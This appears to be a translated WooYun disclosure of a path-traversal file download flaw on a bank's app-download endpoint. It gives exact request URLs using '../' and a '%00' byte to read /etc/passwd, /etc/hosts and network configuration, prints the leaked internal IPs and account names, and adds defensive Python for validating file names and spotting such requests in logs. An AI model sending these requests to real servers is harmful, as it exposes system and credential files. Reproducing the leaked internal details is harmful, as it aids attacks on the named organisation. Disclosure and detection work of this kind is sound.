WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2016-03-20: Details reported to the vendor, awaiting vendor handling
2016-03-22: Vendor confirmed; details disclosed to the vendor only
2016-04-01: Details disclosed to core white hats and domain experts
2016-04-11: Details disclosed to regular white hats
2016-04-21: Details disclosed to intern white hats
2016-05-06: Details disclosed to the public
Arbitrary file download
NIC configuration
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.0apk
DEVICE=eth0
TYPE=Ethernet
ONBOOT=yes
NM_CONTROLLED=no
BOOTPROTO=none
IPADDR=10.2.12.33
GATEWAY=10.2.12.254
NETMASK=255.255.255.0
DNS1=10.0.19.1
DNS2=10.0.19.2
System version information
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/issue%00.0apk
CentOS release 6.6 (Final)
Kernel \r on an \m
hosts file
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/hosts%00.0apk
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.2.12.33 localhost
192.168.152.45 msg.cmbchinaucs.com
10.2.12.33 APP1233
This one needs no explanation.
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/passwd%00.0apk
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/false
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/bin/false
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/bin/false
operator:x:11:0:operator:/root:/bin/false
games:x:12:100:games:/usr/games:/bin/false
gopher:x:13:30:gopher:/var/gopher:/bin/false
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
ucsmy:x:500:500::/home/ucsmy:/bin/bash
nginx:x:501:501::/usr/local/nginx:/sbin/nologin
mysql:x:306:306::/home/mysql:/bin/bash
nagios:x:502:502::/usr/local/nagios:/bin/bash
webadmin:x:503:503::/usr/local/webadmin:/bin/bash
zabbix:x:522:522::/home/zabbix:/bin/bash
splunk:x:523:524::/home/splunk:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ro_l_deid01:x:525:526::/home/ro_l_deid01:/bin/bash
ro_l_deid02:x:526:527::/home/ro_l_deid02:/bin/bash
ro_l_deid03:x:527:528::/home/ro_l_deid03:/bin/bash
ro_l_deid04:x:528:529::/home/ro_l_deid04:/bin/bash
ro_l_deid05:x:529:530::/home/ro_l_deid05:/bin/bash
You get the idea.
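The requests above show a download endpoint that takes a caller-supplied file name containing `../` traversal and a `%00` (NUL) byte; the `%00.0apk` tail suggests the NUL is used to cut the name short before a trailing extension the endpoint expects, so files the web user can read are returned instead of the intended download. The following Python is an added example, not code from this report or from the affected site (whose endpoint is a Java `download.do`): it shows the file-name validation a defender would put in front of such an endpoint, and a small detector that flags requests of this shape in web-server access logs. `DOWNLOAD_ROOT`, `ALLOWED_SUFFIX`, the function names and the log lines are assumptions constructed for the example; the detector also catches the percent-encoded `%2e%2e%2f` form, which goes beyond the single literal form the report shows.

```python
import os
import re
from urllib.parse import unquote

# Assumed directory the endpoint is meant to serve from (example value).
DOWNLOAD_ROOT = "/srv/app/downloads"
# Assumed extension the endpoint intends to serve (example value).
ALLOWED_SUFFIX = ".apk"


def is_safe_download_name(fn: str, root: str = DOWNLOAD_ROOT) -> bool:
    """Accept fn only if it is a bare file name that resolves inside root.

    Order matters: decode first so "%00" and "%2e%2e%2f" are judged on what
    the file API would actually see; then reject NUL bytes (they truncate the
    string in C-backed file calls and defeat any suffix check applied to the
    undecoded value), path separators and dot-prefixed names; finally confirm
    the canonical path still lives under root.
    """
    decoded = unquote(fn)
    if "\x00" in decoded:
        return False
    if "/" in decoded or "\\" in decoded:
        return False
    if not decoded or decoded.startswith("."):
        return False
    if not decoded.lower().endswith(ALLOWED_SUFFIX):
        return False
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    # containment check: the candidate must sit at or below root
    return os.path.commonpath([root_real, candidate]) == root_real


# Patterns that indicate traversal or NUL-byte truncation in a request path,
# checked both raw and after URL decoding so encoded variants (e.g. %2e%2e%2f)
# are caught as well as the literal ../ form.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%2e%2e|%00|\x00", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_traversal_requests(log_lines):
    """Return the request paths in log_lines that match traversal patterns."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(unquote(path)):
            hits.append(path)
    return hits


# Constructed access-log lines in combined-log format (not from the report).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Mar/2016:10:01:02 +0800] "GET /dl/app/download.do?fn=client.apk HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Mar/2016:10:01:09 +0800] "GET /dl/app/download.do?fn=../../../../../../../../../../etc/passwd%00.0apk HTTP/1.1" 200 2310',
    '10.0.0.5 - - [20/Mar/2016:10:01:15 +0800] "GET /dl/app/download.do?fn=%2e%2e%2f%2e%2e%2fetc%2fhosts%00.0apk HTTP/1.1" 200 412',
    '10.0.0.7 - - [20/Mar/2016:10:02:00 +0800] "GET /static/logo.png HTTP/1.1" 200 8800',
]


if __name__ == "__main__":
    for name in ("client.apk",
                 "../../../../../../../../../../etc/passwd%00.0apk",
                 "client.apk%00.txt"):
        verdict = "accepted" if is_safe_download_name(name) else "rejected"
        print(f"{name!r}: {verdict}")
    for path in flag_traversal_requests(SAMPLE_LOG):
        print("suspicious request:", path)
```

The validator deliberately refuses any directory component rather than trying to normalise `..` away: a download endpoint that serves from one directory has no legitimate reason to accept a path, and the `realpath` containment check is kept only as a second line of defence against symlinks inside the root. The detector is a log-side control, useful for confirming whether the pattern was exercised before the fix went in.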
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2016-03-22 09:49
Contacting the relevant website's vendor to carry out the fix.
2016-03-24: Fixed.